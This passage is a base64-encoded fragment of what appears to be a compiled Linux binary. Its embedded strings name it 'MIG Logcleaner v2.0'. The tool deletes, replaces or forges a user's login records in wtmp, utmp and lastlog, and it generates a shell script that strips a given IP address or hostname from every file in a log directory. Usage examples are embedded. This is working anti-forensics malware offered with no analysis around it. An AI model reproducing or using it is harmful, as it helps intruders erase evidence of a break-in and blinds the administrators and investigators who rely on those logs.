+//+Jhej8//+D7AiNhfj8//+DwAhQjYXI/P//UOjF9P//g8QQg+wIjYX4/P//g8BMUI2FyPv//1Do +qfT//4PEEOkN////kItFDItVECnCidA5hez8//8PhQQBAAD/BQDHBAiD7AhqEI2FuPr//1DoE/T/ +/4PEEIPsDI2F+Pz//4PACFDojvP//4PEBInAicBAUOhA8///g8QQicCj+MYECIPsCI2F+Pz//4PA +CFD/NfjGBAjoLvT//4PEEIPsDI2F+Pz//4PATFDoSfP//4PEBInAicBAUOj78v//g8QQicCj8MYE +CIPsCI2F+Pz//4PATFD/NfDGBAjo6fP//4PEEIPsBP+1TP7//2gnqwQIjYW4+v//UOis8///g8QQ +g+wMjYW4+v//UOjq8v//g8QEicCJwEBQ6Jzy//+DxBCJwKP0xgQIg+wE/7VM/v//aCerBAj/NfTG +BAjoafP//4PEEIN9DAAPhOj9//+D7ARogAEAAI2F+Pz//1D/tfD8///oAvL//4PEEOnG/f//ifaD +7ARogAEAAI2F+Pz//1D/tfD8///o3vH//4PEEOmi/f//ifaD7Az/tfT8///o5vH//4PEEIPsDP+1 +8Pz//+jV8f//g8QQg30MAHU5g73s/P//AHQwg+wIaCypBAj/dQj/tez8////NfzGBAj/BfzGBAho +QKsECP81VMgECOim8f//g8Qgx4Xs/P//AAAAAIPsCGoCaHCrBAjoSvL//4PEEInAiYX0/P//g730 +/P///3Uug30UAXUbg+wEaHCrBAhohaoECP81WMgECOhY8f//g8QQg+wMav/oO/L//412AIPsCGpC +aH6rBAjo+fH//4PEEInAiYXw/P//g73w/P///3Ucg30UAXUWg+wIaKCrBAj/NVjIBAjoDPH//4PE +EIPsBGoAagD/tfT8///oh/H//4PEEIPsBGoAagD/tfD8///ocvH//4PEEI12AIPsBGiAAQAAjYV4 +/v//UP+19Pz//+ji8f//g8QQicA9gAEAAHQG6REBAACQjYV4/v//g8Asg+wI/3UIUOh78P//g8QQ +icCJwIXAD4XIAAAAjYXs/P///wCLhej8//87hXz+//8PhYIAAACNlcj8//+NhXj+//+DwAiD7AhS +UOg58P//g8QQicCJwIXAdV6Nlcj7//+NhXj+//+DwEyD7AhSUOgV8P//g8QQicCJwIXAdTqDfQwA +D4RE////g+wMaHCrBAj/dQj/NfzGBAj/BfzGBAho4KsECP81VMgECOj57///g8Qg6RX///+Qg30M +AA+ECv///4PsBGiAAQAAjYV4/v//UP+18Pz//+ic7///g8QQ6ej+//+D7ARogAEAAI2FeP7//1D/ +tfD8///oeu///4PEEOnG/v//ifaD7Az/tfT8///ogu///4PEEIPsDP+18Pz//+hx7///g8QQg30M +AHU5g73s/P//AHQwg+wIaHCrBAj/dQj/tez8////NfzGBAj/BfzGBAhoQKsECP81VMgECOhC7/// +g8Qgg+wIaHCrBAhoLKkECGhwqwQIaCypBAhoIKwECI2FyPr//1DoJ/D//4PEIIPsDI2FyPr//1Do +Fe///4PEELgAAAAAycONdgBVieWB7FgBAACD7AhoJAEAAI2FuP7//1Doq+///4PEEIPsDP91COit +7///g8QQicCJRfSDffQAD4T3AAAAg+wIagJoWKwECOhs7///g8QQicCJhbT+//+DvbT+//8AD4jQ +AAAAg+wEagCLRfSLUAiJ0MHgAwHQweADAdDB4AJQ/7W0/v//6P7u//+DxBCDPQDHBAgBdUaDfRwA +dECD7ARoAAEAAP91EI2FuP7//4PAJFDo4u7//4PEEIPsBGog/3UUjYW4/v//g8AEUOjI7v//g8QQ +i0UYiYW4/v//g+wMaFisBAj/dQj/NfzGBAj/BfzGBAhogKwECP81VMgECOj17f//g8Qgg+wEaCQB +AACNhbj+//9Q/7W0/v//6Kjt//+DxBCD7Az/tbT+///ot+3//4PEELgAAAAAycOQVYnlgexoBQAA +x4XY/P//AAAAAMeF1Pz//wAAAACLRSCJhfD8///HhfT8//8AAAAAi0UkiYXo/P//x4Xs/P//AAAA +AIPsCGogjYWo/P//UOg47v//g8QQg+wIaAABAACNhaj7//9Q6CHu//+DxBCD7AhoAAEAAI2FqPr/ +/1DoCu7//4PEEIN9EP8PhJIHAACD7AhqAmgsqQQI6N7t//+DxBCJwImF4Pz//4O94Pz///91LoN9 +KAF1G4PsBGgsqQQIaIWqBAj/NVjIBAjo7Oz//4PEEIPsDGr/6M/t//+NdgCD7AhqQmicqgQI6I3t +//+DxBCJwImF3Pz//4O93Pz///91KYN9KAF1FoPsCGjAqgQI/zVYyAQI6KDs//+DxBCD7Axq/+iD +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 +7AhoAAEAAI2FaPr//1DoM+b//4PEEGbHhfj8//8HAMeF/Pz//wAAAABmx4VE/v//AABmx4VG/v// +AADHhUj+//8AAAAAi0UkiYVM/v//x4VQ/v//AAAAAIPsCP91GI2F+Pz//4PALFDoOeb//4PEEIPs +CP91HI2F+Pz//4PACFDoIeb//4PEEIPsCP91II2F+Pz//4PATFDoCeb//4PEEGbHhXj7//8IAMeF +fPv//wAAAABmx4XE/P//AABmx4XG/P//AADHhcj8//8AAAAAi0UoiYXM/P//x4XQ/P//AAAAAIPs +CP91GI2FePv//4PALFDor+X//4PEEIPsCP91HI2FePv//4PACFDol+X//4PEEIPsCP91II2FePv/ +/4PATFDof+X//4PEEIPsCGoCaCypBAjo/eT//4PEEInAiYV0+///g710+////w+EZQIAAIPsCGpC +aJyqBAjo1uT//4PEEInAiYVw+///g71w+////3Ucg30sAXUWg+wIaMCqBAj/NVjIBAjo6eP//4PE +EJCQg+wEaIABAACNhXj+//9Q/7V0+///6Ork//+DxBCJwD2AAQAAdAbpJQEAAJCNhXj+//+DwCyD +7Aj/dQhQ6IPj//+DxBCJwInAhcAPhdwAAABmg714/v//CA+EzgAAAI2FbPv///8Ai1UMi0UQKdBA +OYVs+///D4WNAAAAg+wEaIABAACNhXj+//9Q/7Vw+///6B/j//+DxBCD7ARogAEAAI2F+Pz//1D/ +tXD7///oAuP//4PEEIPsBGiAAQAAjYV4+///UP+1cPv//+jl4v//g8QQg+wEaCypBAj/dQj/dQz/ +dRj/NfzGBAj/BfzGBAhoQK0ECP81VMgECOjl4v//g8Qg6fn+//+Qg+wEaIABAACNhXj+//9Q/7Vw ++///6JLi//+DxBDp1v7//4n2g+wEaIABAACNhXj+//9Q/7Vw+///6G7i//+DxBDpsv7//4n2i0UI +gDgAdXWDvWj7//8AdWyD7ARogAEAAI2F+Pz//1D/tXD7///oOeL//4PEEIPsBGiAAQAAjYV4+/// +UP+1cPv//+gc4v//g8QQg+wMaCypBAj/dRj/NfzGBAj/BfzGBAhooK0ECP81VMgECOgi4v//g8Qg +jYVo+////wCD7Az/tXT7///o+eH//4PEEIPsDP+1cPv//+jo4f//g8QQaCypBAhoLKkECGjgrQQI +jYVo+v//UOjq4v//g8QQg+wMjYVo+v//UOjY4f//g8QQ6ySNdgCDfSwBdRuD7ARoLKkECGiFqgQI +/zVYyAQI6KLh//+DxBDHhWz7//8AAAAAx4Vo+///AAAAALgAAAAAycNVieWB7PgDAACD7Aho5wMA +AI2FCPz//1DoN+L//4PEEIPsDP91EP91DP91CGggrgQIjYUI/P//UOhX4v//g8Qgg+wMjYUI/P// +UOhF4f//g8QQg+wMaNqwBAjoNeH//4PEEIPsDGjvsAQI6CXh//+DxBCD7Az/dQj/dRD/dQz/NfzG +BAj/BfzGBAhoALEECOhw4f//g8Qgg+wMaO+wBAjoEOH//4PEEIPsDGg6sQQI6ADh//+DxBCD7Axo +RrEECOjw4P//g8QQg+wMaFKxBAjo4OD//4PEELgAAAAAycOJ9lWJ5YPsCIPsDGiAqAQI6BHh//+D +xBCD7AxowKgECOgB4f//g8QQg+wMaGCxBAjo8eD//4PEEIPsCP91CGigsQQI6N7g//+DxBCD7Axo +7bEECOjO4P//g8QQg+wMaCCyBAjovuD//4PEEIPsDGiAsgQI6K7g//+DxBCD7AxowLIECOie4P// +g8QQg+wMaCCzBAjojuD//4PEEIPsDGiAswQI6H7g//+DxBCD7AxowLMECOhu4P//g8QQg+wMaCC0 +BAjoXuD//4PEEIPsDGhgtAQI6E7g//+DxBCD7AxooLQECOg+4P//g8QQg+wMaOC0BAjoLuD//4PE +EIPsDGhAtQQI6B7g//+DxBCD7AxogrUECOgO4P//g8QQg+wI/3UIaKC1BAjo+9///4PEEIPsCP91 +CGjgtQQI6Ojf//+DxBCD7Aj/dQhoALYECOjV3///g8QQg+wI/3UIaEC2BAjowt///4PEEIPsCP91 +CGiAtgQI6K/f//+DxBC4AAAAAMnDkJCQkJCQkJCQVYnlU4PsBKEIxwQIuwjHBAiD+P90Fo12AI28 +JwAAAACD6wT/0IsDg/j/dfRYW13DVYnlg+wIiexdw422AAAAAFWJ5VNS6AAAAABbgcMOHwAAjXYA +6Ffg//+LXfzJwwAAAwAAAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvdmFyL2xvZy8AdTpu +OkQ6YTpiOlU6VDpIOkk6TzpSQWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChtbMDsz +Mm0qKioqKioqKioqKioqKioqKioqKioqKioqKioqKiobWzBtCgAAAAAAAAAAAAAAAAAAAAAAAAAA +ABtbMDszMm0qIE1JRyBMb2djbGVhbmVyIHYyLjAgYnkgG1swOzMxbW5vMSAbWzA7MzJtKhtbMG0K +AAAAAAAAAAAbWzA7MzJtKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqG1swbQoKAC92YXIv +bG9nL3d0bXAAAAAAAAAARXJyb3Igb3BlbmluZyAlcyBmaWxlIHRvIGNvdW50IHJlY29yZHMKAAoA +AAAAAAAAkIwECJyKBAicigQILIsECJyKBAicigQInIoECAiMBAgwjAQInIoECJyKBAicigQInIoE +CJyKBAhYjAQInIoECJyKBAiAjAQInIoECOCLBAi4iwQInIoECJyKBAicigQInIoECJyKBAicigQI +nIoECJyKBAicigQInIoECJyKBAhoiwQIkIsECJyKBAigjAQInIoECJyKBAicigQInIoECJyKBAic +igQInIoECJyKBAicigQIDIsECJyKBAicigQInIoECJyKBAicigQInIoECOyKBAgAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAWzB4JWRdICVkIHVzZXJzICIlcyIgZGV0ZWN0ZWQgaW4gJXMKAEVy +cm9yIG9wZW5pbmcgJXMgZmlsZQoAL3RtcC9XVE1QLlRNUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +RXJyb3Igb3BlbmluZyAvdG1wL1dUTVAuVE1QIGZpbGUKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAFsweCVkXSBSZW1vdmVkICIlcyIgZW50cnkgIyVkIGZyb20gJXMKACVsZAAAAAAAAAAA +AAAAAAAAAAAAAAAAAABbMHglZF0gUmVtb3ZlZCAlZCBlbnRyaWVzIG9mIHVzZXIgIiVzIiBmcm9t +ICVzCgAvdmFyL3J1bi91dG1wAC90bXAvVVRNUC5UTVAAAAAAAAAAAAAAAAAAAAAAAAAAAABFcnJv +ciBvcGVuaW5nIC90bXAvVVRNUC5UTVAgZmlsZQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAWzB4JWRdIFJlbW92ZWQgIiVzIiBjb3Jlc3BvbmRpbmcgZW50cnkgZnJvbSAlcwoAAAAAAAAA +AAAAAAAAAAAAAG12IC90bXAvV1RNUC5UTVAgJXM7bXYgL3RtcC9VVE1QLlRNUCAlcztjaG1vZCA2 +NDQgJXMgJXMAL3Zhci9sb2cvbGFzdGxvZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsweCVkXSBD +aGFuZ2luZyAiJXMiIGNvcmVzcG9uZGluZyBlbnRyeSBpbiAlcwoAAAAAAAAAAAAAAAAAAAAAAABb +MHglZF0gUmVwbGFjZWQgIiVzIiBlbnRyeSAjJWQgZnJvbSAlcwoAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAWzB4JWRdIFJlcGxhY2VkICIlcyIgY29yZXNwb25kaW5nIGVudHJ5IGZyb20gJXMKAAAA +AAAAAAAAAAAAAAAAAFsweCVkXSBBZGRlZCAgdXNlciAiJXMiIGJlZm9yZSAlZCBlbnRyeSBvZiB1 +c2VyICIlcyIgaW4gJXMgZmlsZQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsweCVk +XSBBZGRlZCAgdXNlciAiJXMiIGVudHJ5IG9uIHRvcCBvZiAgJXMgZmlsZQoAAAAAAAAAAAAAAAAA +AABtdiAvdG1wL1dUTVAuVE1QICVzO2NobW9kIDY0NCAlcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAZWNobyAiZmluZCAlcyAtdHlwZSBmfGdyZXAgLXYgd3RtcHxncmVwIC12IHV0bXB8 +Z3JlcCAtdiBsYXN0bG9nPi90bXAvZGlycy5JUCI+L3RtcC9taWcuc2g7ZWNobyAiaWYgWyAtcyAv +dG1wL2RpcnMuSVAgXSI+Pi90bXAvbWlnLnNoO2VjaG8gdGhlbj4+L3RtcC9taWcuc2g7ZWNobyAi +c2V0IFxgY2F0IC90bXAvZGlycy5JUFxgIj4+L3RtcC9taWcuc2g7ZWNobyAiZm9yIEYxIGluIFxg +ZWNobyBcJEBcYCI+Pi90bXAvbWlnLnNoO2VjaG8gZG8+Pi90bXAvbWlnLnNoO2VjaG8gImNhdCBc +IlwkRjFcInxncmVwIC12IFwiJXNcIj4vdG1wL0YxLnRtcDtjYXQgL3RtcC9GMS50bXA+XCJcJEYx +XCIiPj4vdG1wL21pZy5zaDtlY2hvIGRvbmU+Pi90bXAvbWlnLnNoO2VjaG8gZmk+Pi90bXAvbWln +LnNoO2VjaG8gImlmIFsgLXMgL3RtcC9kaXJzLklQIF0iPj4vdG1wL21pZy5zaDtlY2hvIHRoZW4+ +Pi90bXAvbWlnLnNoO2VjaG8gInNldCBcYGNhdCAvdG1wL2RpcnMuSVBcYCI+Pi90bXAvbWlnLnNo +O2VjaG8gImZvciBGMiBpbiBcYGVjaG8gXCRAXGAiPj4vdG1wL21pZy5zaDtlY2hvIGRvPj4vdG1w +L21pZy5zaDtlY2hvICJjYXQgXCJcJEYyXCJ8Z3JlcCAtdiBcIiVzXCI+L3RtcC9GMi50bXA7Y2F0 +IC90bXAvRjIudG1wPlwiXCRGMlwiIj4+L3RtcC9taWcuc2g7ZWNobyBkb25lPj4vdG1wL21pZy5z +aDtlY2hvIGZpPj4vdG1wL21pZy5zaABjaG1vZCAreCAvdG1wL21pZy5zaAAvdG1wL21pZy5zaAAA +AAAAAFsweCVkXSBSZW1vdmVkICIlcyIgYW5kICIlcyIgc3RyaW5ncyBvdXQgb2YgJXMgZGlyZWNv +dHJ5CgAvdG1wL0YxLnRtcAAvdG1wL0YyLnRtcAAvdG1wL2RpcnMuSVAAABtbMDszMm0qKioqKioq +KioqKioqKioqKioqKioqKioqKioqKiobWzBtCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c2FnZTog +JXMgWy11XSBbLW5dIFstZF0gWy1hXSBbLWJdIFstUl0gWy1BXSBbLVVdIFstVF0gWy1IXSBbLUld +IFstT10gWy1kXQoKACBbLXUgPHVzZXI+XQktIHVzZXJuYW1lCgAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAACBbLW4gPG4+XQktIHVzZXJuYW1lIHJlY29yZCBudW1iZXIsIDAgcmVtb3ZlcyBhbGwg +cmVjb3JkcyAoZGVmYXVsdDogMSkKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbLWQgPGRpcj5d +CS0gbG9nIGRpcmVjdG9yeSAoZGVmYXVsdDogL3Zhci9sb2cvKQoAAAAAAAAAAAAAAAAAAAAgWy1h +IDxzdHJpbmcxPl0JLSBzdHJpbmcgdG8gcmVtb3ZlIG91dCBvZiBldmVyeSBmaWxlIGluIGEgbG9n +IGRpciAoaXA/KQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgWy1iIDxzdHJpbmcyPl0JLSBzdHJp +bmcgdG8gcmVtb3ZlIG91dCBvZiBldmVyeSBmaWxlIGluIGEgbG9nIGRpciAoaG9zdG5hbWU/KQoA +AAAAAAAAAAAAAAAAAAAAAAAgWy1SXQkJLSByZXBsYWNlIGRldGFpbHMgb2Ygc3BlY2lmaWVkIHVz +ZXIgZW50cnkKAAAAAAAAAAAAAAAAAAAAIFstQV0JCS0gYWRkIG5ldyBlbnRyeSBiZWZvcmUgc3Bl +Y2lmaWVkIHVzZXIgZW50cnkgKGRlZmF1bHQ6IDFzdCBlbnRyeSBpbiBsaXN0KQoAAAAAAAAAAAAA +AAAAAAAAIFstVSA8dXNlcj5dCS0gbmV3IHVzZXJuYW1lIHVzZWQgaW4gLVIgb2YgLUEKAAAAAAAA +AAAAAAAAAAAAAAAAACBbLVQgPHR0eT5dCS0gbmV3IHR0eSB1c2VkIGluIC1BCgAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAgWy1IIDxob3N0Pl0JLSBuZXcgaG9zdG5hbWUgdXNlZCBpbiAt +UiBvciAtQQoAAAAAAAAAAAAAAAAAAAAAAAAAIFstSSA8bj5dCS0gbmV3IGxvZyBpbiB0aW1lIHVz +ZWQgaW4gLVIgb3IgLUEgKHVuaXQgdGltZSBmb3JtYXQpCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAIFstTyA8bj5dCS0gbmV3IGxvZyBvdXQgdGltZSB1c2VkIGluIC1SIG9yIC1BICh1 +bml0IHRpbWUgZm9ybWF0KQoAIFstZF0JCS0gZGVidWcgbW9kZQoKAAAAAAAAAAAAZWc6ICAgICVz +IC11IGpvaG4gLW4gMiAtZCAvc2VjcmV0L2xvZ3MvIC1hIDEuMi4zLjQgLWIgbGVldC5vcmcKACAg +ICAgICAlcyAtdSBqb2huIC1uIDYKAAAAAAAAAAAAICAgICAgICVzIC1kIC9zZWNyZXQvbG9ncy8g +LWEgMS4yLjMuNAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAgICAlcyAtdSBqb2huIC1u +IDIgLVIgLUggY2hpbmEuZ292CgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgICAgICAgJXMgLXUg +am9obiAtbiA1IC1BIC1VIGphbmUgLVQgdHR5MSAtSCBhcmIuY29tIC1JIDEyMzQ1MzM0IC1PIDEy +MzQ1Mzk3CgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTHBAgAAAAAAAAAAAAAAAAAAAAAAQAA +AAAAAAAAAAAA/////wAAAAD/////AAAAAIzHBAgAAAAAAAAAAJKGBAiihgQIsoYECMKGBAjShgQI +4oYECPKGBAgChwQIEocECCKHBAgyhwQIQocECFKHBAhihwQIcocECIKHBAiShwQIoocECLKHBAjC +hwQI0ocECOKHBAjyhwQIAogECBKIBAgAAAAAAQAAABAAAAAMAAAAZIYECA0AAAAAqAQIBAAAACiB +BAgFAAAA4IMECAYAAADwgQQICgAAABYBAAALAAAAEAAAABUAAAAAAAAAAwAAABjHBAgCAAAAyAAA +ABQAAAARAAAAFwAAAJyFBAgRAAAAfIUECBIAAAAgAAAAEwAAAAgAAAD+//9vTIUECP///28BAAAA +8P//bwyFBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB +AAAAAACiAIUZAAAIAAAAZAAAAESIBAgBAAAAZAAAAESIBAg6AAAAPAAAAAAAAABJAAAAgAAAAAAA +AABzAAAAgAAAAAAAAACNAAAAgAAAAAAAAAC8AAAAgAAAAAAAAAD0AAAAgAAAAAAAAAAxAQAAgAAA +AAAAAACCAQAAgAAAAAAAAADTAQAAgAAAAAAAAAD+AQAAgAAAAAAAAAAtAgAAgAAAAAAAAABXAgAA +gAAAAAAAAACAAgAAgAAAAAAAAACaAgAAgAAAAAAAAAC1AgAAgAAAAAAAAADWAgAAgAAAAAAAAAAP +AwAAgAAAAAAAAAAyAwAAgAAAAAAAAABXAwAAgAAAAAAAAACBAwAAgAAAAAAAAACqAwAAggAAAAAA +AADEAwAAggAAAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAAALBAAAggAAAGNWAAAmBAAAggAA +AO9bAQBOBAAAggAAAAAAAABkBAAAggAAAAAAAAB7BAAAggAAAAAAAAAAAAAAogAAAAAAAAAAAAAA +ogAAAAAAAAAAAAAAogAAAAAAAACPBAAAggAAANgEAADIBAAAgADHAAAAAAAAAAAAogAAAAAAAADc +BAAAgAAgAAAAAADzBAAAgAAhAAAAAAAKBQAAgAAiAAAAAAAfBQAAgAAjAAAAAAA1BQAAgAAlAAAA +AABNBQAAgAAmAAAAAABjBQAAgAAxAAAAAAB6BQAAgAAyAAAAAACSBQAAgAAzAAAAAACpBQAAgAA0 +AAAAAADCBQAAgAA1AAAAAADaBQAAgAA2AAAAAADzBQAAgAA4AAAAAAALBgAAgAA5AAAAAAAkBgAA +gAA7AAAAAABEBgAAgAA9AAAAAABaBgAAgAA+AAAAAABwBgAAgAA/AAAAAACGBgAAgABAAAAAAACc +BgAAgABBAAAAAACzBgAAgABCAAAAAADLBgAAgABDAAAAAADhBgAAgABEAAAAAAD4BgAAgABFAAAA +AAAOBwAAgABGAAAAAAAmBwAAgABHAAAAAAA9BwAAgABIAAAAAABWBwAAgABJAAAAAABrBwAAgABO +AAAAAADRBwAAgABRAAAAAADpBwAAgABSAAAAAAAJCAAAgABTAAAAAAAgCAAAgABUAAAAAAA7CAAA +gABVAAAAAABXCAAAgABWAAAAAABvCAAAgABYAAAAAACHCAAAgABbAAAAAAChCAAAgABeAAAAAAC5 +CAAAgABlAAAAAADPCAAAgABoAAAAAADpCAAAgABsAAAAAAADCQAAgABxAAAAAAAcCQAAgAByAAAA +AAA3CQAAgAB1AAAAAABSCQAAgAB2AAAAAABvCQAAgAB5AAAAAACKCQAAgAB6AAAAAACnCQAAgAB9 +AAAAAAC/CQAAgACAAAAAAADYCQAAgACDAAAAAADzCQAAgACEAAAAAAAPCgAAgACHAAAAAAAoCgAA +gACKAAAAAABCCgAAggAAAMuUAQB2CgAAggAAAEYQAACeCgAAgAAAAAAAAAAAAAAAogAAAAAAAADU +CgAAgAAAAAAAAAAcCwAAgAAjAAAAAABYCwAAgAAAAAAAAABbDAAAgAA0AAAAAAB3DAAAgAA8AAAA +AADEDAAAgABDAAAAAAD8DAAAgABGAAAAAAAYDQAAgABTAAAAAACrDQAAgABaAAAAAADpDQAAgABe +AAAAAAAGDgAAgAAAAAAAAADbDgAAgABsAAAAAAD7DgAAgAB0AAAAAABPDwAAgAB5AAAAAABwDwAA +gACBAAAAAAD4DwAAgACGAAAAAAA2EAAAgACMAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAACP +BAAAggAAABEKAABOEAAAgAAfAQAAAABkEAAAgAA4AQAAAAAAAAAAogAAAAAAAAB5EAAAggAAAAAA +AACMEAAAggAAAGIfAACPBAAAggAAAAAAAAAAAAAAogAAAAAAAACeEAAAggAAAAAAAAAAAAAAogAA +AAAAAADLEAAAgABLAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAABOEQAAgAAeAAAAAACREQAA +gAAjAAAAAADWEQAAggAAAAAAAADpEQAAggAAADXBAQBOBAAAwgAAAAAAAAB5EAAAwgAAAAAAAACM +EAAAggAAAAAAAACPBAAAwgAAAAAAAACeEAAAwgAAAAAAAAAAAAAAogAAAAAAAACPBAAAwgAAAAAA +AAD6EQAAgAAAAAAAAADZEgAAgAAAAAAAAAAQEwAAgABIAAAAAAA6EwAAgABLAAAAAABpEwAAgABM +AAAAAACaEwAAgABVAAAAAADNEwAAgABaAAAAAAAIFAAAgABeAAAAAABBFAAAgABhAAAAAAB5FAAA +gABiAAAAAACxFAAAgAAAAAAAAABeFQAAgAAAAAAAAAAHFwAAgAAAAAAAAAD9FwAAgAAAAAAAAAB0 +GAAAgACtAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAACYGAAAgAA1AAAAAAALGQAAgAA3AAAA +AAAjGQAAgAA4AAAAAAA7GQAAgAA5AAAAAABVGQAAgAA6AAAAAAAAAAAAogAAAAAAAABvGQAAIAAZ +AAAAAAAAAAAAZAAAAESIBAgAaW5pdC5jAC91c3Ivc3JjL2J1aWxkLzE1ODY1OC1pMzg2L0JVSUxE +L2dsaWJjLTIuMi40L2NzdS8AZ2NjMl9jb21waWxlZC4AaW50OnQoMCwxKT1yKDAsMSk7LTIxNDc0 +ODM2NDg7MjE0NzQ4MzY0NzsAY2hhcjp0KDAsMik9cigwLDIpOzA7MTI3OwBsb25nIGludDp0KDAs +Myk9cigwLDMpOy0yMTQ3NDgzNjQ4OzIxNDc0ODM2NDc7AHVuc2lnbmVkIGludDp0KDAsNCk9cigw +LDQpOzAwMDAwMDAwMDAwMDA7MDAzNzc3Nzc3Nzc3NzsAbG9uZyB1bnNpZ25lZCBpbnQ6dCgwLDUp +PXIoMCw1KTswMDAwMDAwMDAwMDAwOzAwMzc3Nzc3Nzc3Nzc7AGxvbmcgbG9uZyBpbnQ6dCgwLDYp +PUBzNjQ7cigwLDYpOzAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwOzA3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3 